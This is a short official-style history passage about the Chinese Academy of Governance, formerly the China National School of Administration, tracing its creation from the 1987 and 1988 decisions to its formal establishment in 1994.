===============================
Chinese Academy of Governance (previously named China National School of Administration) was born in the surging
tide of reform and opening up, and it constantly developed as the cause of socialism with Chinese characteristics
progressed. It was decided at the Thirteenth National Congress of the Communist Party of China (CPC) in 1987 and
at the First Session of the National People’s Congress in1988 to create a national civil service system and establish
the ChineseAcademy of Governance. Preparatory work on the academy began in 1988, and it was formally established in 1994.
